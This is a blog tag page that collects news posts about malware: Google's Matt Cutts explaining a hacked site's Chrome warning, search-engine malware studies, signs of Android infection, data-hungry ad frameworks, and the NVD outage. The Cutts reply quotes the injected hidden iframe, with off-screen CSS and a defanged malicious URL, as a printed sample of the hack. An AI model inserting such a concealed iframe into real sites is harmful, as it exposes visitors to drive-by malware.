Posts tagged Malware
Malware warning
May 3rd
Recently someone on twitter complained that Chrome was labeling their site as malware:
http://Dvorak.org site blocked by Chrome browser after I wrote negative commentary about Google.
I took a few minutes to compose a reply, so I’ll go ahead and post it here:
Just to summarize: Chrome’s warning is correct. Your blog is hacked and injecting a malicious iframe on dvorak.org/blog/ even on error pages.
At the top of the page, the malicious iframe looks like this: <style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style> <div class=”rrfhezo”><iframe src=”hxxp://cnsycrdv.organiccrap.com/jquery/get.php?ver=jquery.latest.js” width=”420″ height=”475″></iframe>
I would recommend taking your blog down until you can fix the hack and remove the malware. If you verify dvorak.org at http://google.com/webmasters/ then we’ll show you the details we know about the malicious code.
We’re just the messenger here–this definitely had nothing to do with anything you wrote about Google. In fact, we recently published a website to help site owners recover from a hacked site: http://www.google.com/webmasters/hacked/
Getting hacked truly sucks though. I hope you’re able to get things cleaned up and in good shape. When you think the site is clean, you can file an appeal at http://google.com/webmasters for your hacked site and we’ll rescan it for malware. When it’s clean, we’ll remove the warning in Chrome.
Hope that helps,
Matt Cutts
I hope no one reading this ever gets hacked, but the truth is that some people will. You can reduce the odds of getting hacked by keeping all of your web server software up to date. If you do get hacked, our site at http://www.google.com/webmasters/hacked/ will walk you through the process of cleaning up your site. I know that some site owners are annoyed when Google flags their site as hacked or serving malware, but we’re trying to protect our users as best we can.
View full post on Matt Cutts: Gadgets, Google, and SEO
Bing Webmaster Tools Adds Malware Re-Evaluation & Geo-Targeting Tools
Apr 29th
Bing announced two new features for Bing Webmaster Tools. First, you can now see more details on malware issues impacting your site and be able to submit a malware re-evaluation request. Second, you can now geo-target specific pages, directories or your whole site within Bing Webmaster Tools. Bing…
Please visit Search Engine Land for the full article.
View full post on Search Engine Land: News & Info About SEO, PPC, SEM, Search Engines & Search Marketing
5 Signs Your Android Smartphone Is Infected With Malware
Apr 23rd
Guest author Catalin Cosoi is chief security strategist at Bitdefender.
Android malware seems to spreading at a dizzying pace. In the second half of 2012 alone, Bitdefender found that Android malware spiked 292% from the first half of the year. This could pose a threat to millions of smartphone users worldwide.
Android malware is becoming harder to detect for the average smartphone user who pays little, if any, attention to security. Fortunately, most malware creators are not rocket scientists, and a user does not have to be a computer scientist to combat them.
Adding the following clues together could reveal the presence of malware:
1. Bad Battery Life
Android users who don’t perform a lot of battery straining activities have a good idea of how long their battery should last. Malware gives itself away when batteries mysteriously drain quicker than usual. That’s usually due to adware, spam-like malware that shows app users an inordinate amount of ads. Continuously displaying aggressive adware will impact heavily on battery life.
Whether the malware is hiding in plain sight by pretending to be a regular application or trying to stay hidden from the user, abnormal battery drainage can often give away the presence of an Android infection.
2. Dropped Calls And Disruptions
Mobile malware can affect ongoing or incoming calls. Dropped calls or strange disruptions during a conversation could indicate the existence of mobile malware that is interfering. If you can’t blame your mobile carrier, then some strand of mobile malware could be the culprit. Call your service provider to determine if the dropped calls are its fault. If it is not your carrier, it is possible that someone or something is trying to eavesdrop on conversations or perform other suspicious activities.
3. Inordinately Large Phone Bills
Android malware often infects devices and starts sending SMS (text) messages to premium-rated numbers. While these effects are easily seen in your phone bill, not all malware programs are obviously greedy. They may send an SMS message just once a month to avoid suspicions, or they may uninstall themselves after punching a serious hole in your budget. Whether you use a monthly plan or a pay-as-you-go subscription, checking your bill should make it easy to figure out such message-sending malware has found its way onto a device.
4. Data Plan Spikes
Malware that smuggles data from your device to a third-party can often be detected by an examination of your data plan bill. Significant changes in your download or upload patterns could be a sign that someone or something has control over your device. Setting up data meter quotas might help figure out if a device has been compromised by data broadcasting malware. It will also help dodge high phone bills.
5. Clogged Performance
Depending on device hardware specifications, malware infestation may cause serious performance problems as it tries to read, write or broadcast data from your smartphone. Anybody that has ever had a PC infected with malware should be familiar with this. Imagine rebooting a device several times a day because background-running malware consumes too much processing power to let apps work properly. Performance clogging is yet another sign that malware might be present on your device. Checking RAM (Random Access Memory) use or CPU load could reveal the presence of malware that’s actively running on the device.
Stay Safe And Be Mindful
The Android versions most targeted by malware are the common ones – Gingerbread 2.3, Ice Cream Sandwich 4.0 and Jelly Bean 4.1. Android users with these builds have an 88% chance of having their mobile phone infected with malware according to the Android Developer Dashboard.
In the event that you do find yourself with malware on your Android, there are a couple of options. First, delete the offending app. Even if the app is deleted, malware may still linger. You may have to completely reset your smartphone by going into the settings menu and peforming a “factory reset,” which will clear the memory of the device.
A variety of paid and free security apps are available in the Google Play Android app store to help prevent apps from doing bad things. If you use your Android smartphone for business, your IT department likely has security solutions to help you purge any malware.
In general, it is wise to scrutinize each and every permission an Android app asks for – many apps ask for invasive permissions when they don’t need them. Even apps packed with aggressive adware have a knack for collecting more data than they would ordinarily need to perform adequately. Be sure to read your permissions before clicking “accept.”
View full post on ReadWrite
Bing: Our Search Results Do Not Infect Users, “Malware Study Was Wrong”
Apr 19th
Bing has responded to the malware study conducted by AV-TEST earlier this week, claiming that Bing search results led to five times more malware than Google. To that Bing said, “the conclusions many have drawn from the study are wrong.” Why is the study wrong according to Bing? While…
Please visit Search Engine Land for the full article.
View full post on Search Engine Land: News & Info About SEO, PPC, SEM, Search Engines & Search Marketing
Weekly Rundown: Google & Spam, Search Malware, GM Back to Facebook & More
Apr 14th
Google’s Matt Cutts and former ex-Googlers talk spam, rankings, and SEO tips. Google has safer results than Bing, Yandex, and Blekko. GM likes Facebook ads again. Here’s a quick recap of search and social marketing news and tips from the past week.
View full post on Search Engine Watch – Latest
Yandex Takes Exception To Search Malware Study
Apr 12th
Yandex has taken exception to a recent study that reported it has more malware in its search results than other major search engines like Google and Bing. The company shared its concerns with Search Engine Land via email, saying that it also sent the same response to AV-TEST, the German IT security…
Please visit Search Engine Land for the full article.
View full post on Search Engine Land: News & Info About SEO, PPC, SEM, Search Engines & Search Marketing
Google Beats Bing, Yandex & Blekko At Keeping Malware Out Of Search Results [Study]
Apr 11th
About three years ago, Google was labeled in one study as the “King of Malware.” Things have apparently changed a lot since then. A new study reports that Google is beating its primary search competitors pretty significantly when it comes to keeping malware out of search results. The…
Please visit Search Engine Land for the full article.
View full post on Search Engine Land: News & Info About SEO, PPC, SEM, Search Engines & Search Marketing
Many Free Android Apps Are Starting To Look A Lot Like Malware
Apr 5th
The money-go-round between app developers and ad networks is starting to blur the line between many free Android apps and malware. While these legitimate apps aren’t stealing passwords, they’re still riding roughshod over user privacy by gratuitously sucking up your contact and location information — or worse.
What These Bad Apps Glom Onto
Between last September and March, security vendor Bitdefender analyzed 130,000 popular Android apps on Google Play and found that roughly 13% collected your phone number without explicit notification, 12% stored your location data and 8% sucked up your email address. Included in those numbers are apps that siphoned off one or more of the three.
Many apps don’t stop there. Other data they glom onto includes your browsing activity, your contact list, the unique identification number of your device and even your call registry.
These apps took all that information legally. Android apps display their privacy policies in seeking permission to gather personal data, and many developers bank on the fact that most people will just click through to the app.
(See also: Hey! iOS Apps Play Faster And Looser With Your Data Than Android)
All that data gathering typically starts when an app developer download an ad framework provided by more than 400 companies listed on the Ad Network Directory. Such frameworks makes it easy for developers to display ads in the app, and thus to get paid every time someone clicks on them.
Since free apps only make money for developers from such clicks (and, it turns out, the distribution of associated user data), very few pay attention to exactly what kind of information ad frameworks are gathering.
“Because they copy-paste the code, they don’t really debug it; they don’t really look through it and see what data it collects,” Bitdefender researcher Liviu Arsene told me. “I bet they don’t even care.”
And It Doesn’t Stop There
App privacy policies often stake out even more aggressive data-collection goals, presumably to pave the way for future updates to vacuum up more info and further erode user privacy.
Take, for instance, Airpush, the second-largest ad network for Android developers with 40,000 apps. Its privacy policy reads, in part:
[I]n accordance with the permissions you have granted, we may collect your device ID, device make and model, device IP address, mobile web browser type and version, mobile carrier, real-time location information, email address, phone number and a list of the mobile applications on your device.
The policy goes on to explain that Airpush might supply that information to third-party advertisers who are part of its ad platform and third-party vendors, consultants and other service providers. Because the data is available to so many organizations, it’s virtually impossible to know who is using your personal data, and how, once it leaves the device.
Obviously, the possibilities for abuse here are legion. Suppose one of those third-party organizations is acquired by an outfit that is, shall we say, less reputable. Or that a third party company’s computers are hacked, spilling your data into the hands of cybercriminals.
The Feds Agree: It’s A Huge Problem
Federal regulators acknowledge that a huge problem exists. “Mobile technology provides unique privacy challenges,” Jon Leibowitz, departing chairman of the Federal Trade Commission, said in February, as reported by The Wall Street Journal. “Some would say it’s a sort of Wild West.”
The FTC wants the mobile industry to bolster privacy controls by allowing phone users to opt out of being tracked by ad networks. The commission also wants apps to prominently display the kind of data they’re collecting, rather than burying it in fine print. Congress is also considering proposals to tighten privacy protections on mobile devices, though it’s hard to say how such measures will fare given firm opposition from industry.
In the meantime, here’s some free (!!) advice: Scrutinize your free mobile apps as if they’re malware ready to wreak havoc on your personal information.
Image courtesy of Shutterstock
View full post on ReadWrite
Oh, The Irony: National Vulnerablity Database Taken Down By Malware
Mar 14th
As if we needed more evidence that the hackers are winning, here is this: the National Vulnerability Database hosted by the National Institute of Standards and Technology has been stricken with malware and taken offline.
The NVD is a comprehensive database that integrates all of the United State’s government publicly available vulnerability resources. It is a resource to many security firms and security officers at enterprises for tracking day-to-day exploits that malicious hackers could use to breach secure systems.
In an email to security researcher Kim Halavakoski of Finland, NIST said that it had found multiple instances of malware on its public facing NVD websites and took the appropriate action to take the websites offline.
“The National Vulnerability Database public-facing Web site and several other NIST-hosted Web sites are currently unavailable due to discovery of malware on two NIST Web servers,” wrote Gail Porter from the NIST Public Inquiries Office, according to a Google+ post by Halavakoski as reported by The Register.
Visits to the NVD website confirm that it is indeed unavailable as of 9:00 a.m. EST, March 14.
The email from Porter to Halavokoski states that NIST’s firewall detected suspicious activity on Friday, March 8 and took steps to block the traffic from reaching the Internet. The malware on the NIST servers was traced to a software vulnerability. NIST said that there was no evidence its websites or the NVD contained or delivered any malware to users.
“NIST continually works to maintain the integrity of its IT infrastructure and acts to limit the impact of malware on its systems. We regret the impact this has had on our services,” Porter wrote.
Nowadays, everything is a target. That goes for the public facing websites and servers of prominent government agencies such as the NIST and CIA. When it comes to the backbone of government systems (non-public facing servers), those are much harder to crack. That is why we see more distributed denial of service (DDoS) attacks on prominent websites than actual breaches. Much of this DDoS activity came from groups like Anonymous and LulzSec, but the global black hat hacker community has been stepping up its efforts in past years to actually breach internal servers. We have seen this through more advanced spear phishing techniques and the alleged hacker wing of the People’s Liberation Army of China.
The NIST NVD site makes for an easy target. It is relied upon by many different groups and has a necessary public-facing websites that is, by basic Internet Protocol, vulnerable. NIST played the breach by the book and took the site down.
View full post on ReadWrite
Where Has All The Mobile Malware Gone?
Feb 14th
Remember when everyone used to run Windows? Hardly a week went by when a friend or colleague lobotomized their machine with a virus. Some of this may have been a matter of Microsoft’s architecture, but much of it came down to Windows being a massive, juicy target. Given how much of our computing has moved to mobile, why aren’t we seeing mobile malware overwhelm us?
Mobile malware is out there, after all. Security software vendor ESET predicts “exponential growth of mobile malware” in 2013, coming on the heels of a 17X boom in mobile malware in 2012. Security company F-Secure finds that 79% of this new malware is focused squarely on the market leader, Android.
So why haven’t you been hacked?
After all, Android now commands over 50% of the global smartphone market, and took a whopping 69.7% of the market in Q4 2012, according to Gartner. Apple dominated the smartphone market for years with nary a scent of malware, perhaps due to its end-to-end control of its devices. Android is apparently getting slammed, according to the security firms, but I’ve yet to meet anyone that has experienced mobile malware, and I bet you haven’t, either. Why?
Hacks Vs. Mischief
It’s also possible that you have been attacked, but didn’t recognize it. According to BlueCoat Systems, “Mobile threats are still largely mischiefware – they have not yet broken the device’s security model but are instead more focused on for-pay texting scams or stealing personal information.” This jibes with ESET’s finding that of the types of malware being created, the most common today are SMS Trojans (40%), followed by malware apps that the devices they infect into zombies (32%), and malicious apps that pilfer information from one’s phone (28%).
Heavy-duty exploits are still uncommon, but that may change. For desktop exploits, malicious hackers can purchase ready-made exploit kits. These are far less common in the mobile world. Instead hackers increasingly are turning to the web to create device-agnostic attacks, infecting a web server and then directing users via phishing emails to click through to the infected site. When the user visits the site, malware is downloaded to her device. Given that so many companies use third parties to develop and host their mobile applications (e.g., usablenet for some hotel properties), users are not as suspicious as they should be of “mislabeled” sites.
Still, this likely hasn’t happened to you. Why?
Location, Location, Location
Geography. If you’re living in North America or Western Europe, you apparently aren’t the target. Yet. According to ESET, China, Russia and Iran have the highest incidence of malware by far. Another hot spot, according to Trend Micro, is Asia-Pacific, where it found a 417% increase in mobile malware apps (25,000) between Q1 and Q2 2012.
While mobile security firm BitDefender expects attacks against devices in North America and Europe to increase in 2013, the people infected are largely those visiting the seedier side of the Web, be it porn sites or unofficial app marketplaces.
Given how pervasive mobile computing has become, it’s inevitable that hackers will find more sophisticated ways to break through existing security mechanisms. Android isn’t the new Windows. Not yet.
Image courtesy of Shutterstock.
View full post on ReadWrite
